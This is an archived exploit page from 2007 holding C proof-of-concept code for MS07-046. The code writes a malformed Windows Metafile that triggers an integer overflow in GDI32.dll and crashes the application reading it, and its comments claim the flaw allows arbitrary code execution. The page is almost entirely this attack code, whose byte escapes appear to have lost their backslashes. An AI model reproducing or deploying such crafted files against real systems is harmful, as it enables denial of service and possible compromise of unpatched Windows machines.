Home / os / blackberry
gdi32-dos.txt
Posted on 30 August 2007
/* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong & Chun Woo-Chi * Yang yeon(?~1542), Korea * "I shall keep clenching my left fist unitl i see the real tao". * This POC is only for test. If an application read a malformed wmf * file like this POC, the application will be crashed. If you apply * this code, you can execute an arbitrary code. * * We tested this code on Windows XP SP2 Korean Edition * (GDI32.dll version 5.1.2600.3099). But it will work well on other * systems. */ #include <stdio.h> #include <windows.h> #define WMF_FILE "ms07-046.wmf" void usage(void); int main() { FILE *fp; char wmf[] = "x01x00x09x00x00x03x11x00x00x00x00x00"\n"x05x00x00x00x00x00xFFxFFxFFxFFx13x02"\n"x32x00x96x00x03x00x00x00x00x00"; int i; HMETAFILE srcMeta; usage(); if ((fp = fopen(WMF_FILE, "w")) == NULL) { printf("File %s write error ", WMF_FILE); return 0; } for(i=0; i<sizeof(wmf)-1; i++) fputc(wmf[i], fp); fclose(fp); srcMeta = GetMetaFile(WMF_FILE); CopyMetaFile( srcMeta, NULL); return 0; } void usage(void) { printf("MS07-046 Windows Meta File RecordParms Integer Overflow "); printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi "); }